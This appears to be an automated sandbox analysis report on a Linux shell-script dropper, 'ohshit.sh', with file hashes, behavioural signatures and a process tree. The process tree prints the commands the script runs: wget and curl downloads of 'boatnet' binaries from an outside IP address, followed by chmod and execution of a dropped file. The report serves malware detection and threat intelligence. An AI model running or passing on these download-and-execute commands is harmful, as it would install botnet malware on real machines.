Analysis
- max time kernel: 60s
- max time network: 64s
- platform: debian-9_mips
- resource: debian9-mipsbe-20240611-en
- resource tags: arch:mips, image:debian9-mipsbe-20240611-en, kernel:4.9.0-13-4kc-malta, locale:en-us, os:debian-9-mips, system
- submitted: 31-08-2024 21:05
Static task
- static1
Behavioral tasks
- behavioral1: sample ohshit.sh, resource debian12-armhf-20240418-en
- behavioral2: sample ohshit.sh, resource debian12-mipsel-20240729-en
- behavioral3: sample ohshit.sh, resource debian9-armhf-20240611-en
- behavioral4: sample ohshit.sh, resource debian9-mipsbe-20240611-en
- behavioral5: sample ohshit.sh, resource debian9-mipsel-20240611-en
- behavioral6: sample ohshit.sh, resource ubuntu1804-amd64-20240508-en
- behavioral7: sample ohshit.sh, resource ubuntu2004-amd64-20240729-en
- behavioral8: sample ohshit.sh, resource ubuntu2204-amd64-20240611-en
General
- Target: ohshit.sh
- Size: 2KB
- MD5: fefdf2b7ece4d55bd47778b420f84011
- SHA1: 2823096e0538910f9b57ff9bae007ec655520fc3
- SHA256: 3611c98f0a496d5891dc7888ed43a5d9b5eae8b1b27186dbe8b9b83922ae66eb
- SHA512: b1e1c59a9802ea141e48f395d3f5268c351687e7ca8758feb9b6882d51f230be3c72f657219816c82fa61bd811ce37bfb392c0a26d10d5b53bb333e7af03cf21
Malware Config
Signatures
- Executes dropped EXE (1 IoC)
  ioc: /tmp/WTF, pid 822, process WTF
- YARA rule upx matched (1 resource)
  resource: behavioral4/files/fstream-1.dat, yara_rule: upx
- Reads runtime system information (2 IoCs)
  Reads data from /proc virtual filesystem.
  File opened for reading: /proc/sys/crypto/fips_enabled, process curl
  File opened for reading: /proc/sys/crypto/fips_enabled, process curl
- Writes file to tmp directory (4 IoCs)
  Malware often drops required files in the /tmp directory.
  File opened for modification: /tmp/boatnet.x86, process wget
  File opened for modification: /tmp/boatnet.x86, process curl
  File opened for modification: /tmp/WTF, process ohshit.sh
  File opened for modification: /tmp/boatnet.mips, process wget
Processes
- /tmp/ohshit.sh, command line: /tmp/ohshit.sh, PID 713
  signatures: Writes file to tmp directory
  - /usr/bin/wget, command line: wget http://94.156.71.225/hiddenbin/boatnet.x86, PID 719
    signatures: Writes file to tmp directory
  - /usr/bin/curl, command line: curl -O http://94.156.71.225/hiddenbin/boatnet.x86, PID 740
    signatures: Reads runtime system information; Writes file to tmp directory
  - /bin/cat, command line: cat boatnet.x86, PID 820
  - /bin/chmod, command line: chmod +x boatnet.x86 ohshit.sh WTF, PID 821
  - /tmp/WTF, command line: ./WTF, PID 822
    signatures: Executes dropped EXE
  - /usr/bin/wget, command line: wget http://94.156.71.225/hiddenbin/boatnet.mips, PID 824
    signatures: Writes file to tmp directory
  - /usr/bin/curl, command line: curl -O http://94.156.71.225/hiddenbin/boatnet.mips, PID 825
    signatures: Reads runtime system information
Network
MITRE ATT&CK Matrix
Downloads
- Filesize: 36KB
  MD5: ba2cb5b8715ba94c39e24e75a34d0ea0
  SHA1: 7182bf3b0e14e5224e741c15174c6e93f00df444
  SHA256: 01fad47db364d66c0a9ed9c6c5c558c5a95eb0d015bec4be5f1109d14e15ec33
  SHA512: 0c26a32066b88dc22aada2ca606639e6717b84501402eac80107f7130fca6c43f6cd40e11e88ae1deda45320a6c726af04bf946818ef3099d84f31e523f9b33d